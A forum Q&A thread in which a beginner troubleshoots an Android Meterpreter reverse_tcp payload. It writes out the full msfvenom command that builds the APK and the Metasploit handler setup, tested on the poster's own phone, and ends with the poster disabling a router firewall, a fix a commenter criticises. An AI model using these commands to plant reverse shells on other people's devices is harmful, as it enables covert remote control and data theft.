# (exploit) reverse_tcp won't connect?

Tags: exploit, android, metasploit

okay so i'm a little bit new into exploiting etc but i can't seem to understand why i'm not able to create a connection with my phone and the kali handler of tcp

Here is what i do: First i make the apk

```
root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=**(MYIP)** LPORT=**(MYPORT)** R >shell.apk

No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8326 bytes
```

Then i setup the exploit:

```
msf > use multi/handler 

msf exploit(handler) > set payload android/meterpreter/reverse_tcp

payload => android/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST **(MYIP)** 

LHOST => **(MYIP)**

msf exploit(handler) > set LHOST **(MYPORT)**

LHOST => **(MYPORT)**

msf exploit(handler) > exploit

[*] Started reverse TCP handler on **(MYIP):(MYPORT)**

[*] Starting the payload handler...
```

Then I execute shell.apk on my samsung s7 edge and it can't seem to connect to the payload.

Can someone please help?

Comment: Did you forwarded port?

Answer (score 0):

Make sure you and the device are connected on the same network. Also, the application needs to be running in the background. Did you launch the app on your Samsung S7 after your started the exploit? I think the android app is called "MainActivity".

Comment: the devices are connected on the same network. I have tried to launch the "MainActivity" app multiple times without result. I even tried rebooting and redownloading.

Answer (score -2):

The solution turned out to be the following:

I disabled the firewall of my router and it worked.

Comment: Disabling the entire FW is a very bad solution.  Instead, have the Android device and the Kali machine on the same subnet OR setup port forwarding so that your Android device can connect back to the Kali machine through the firewall and your router's public IP.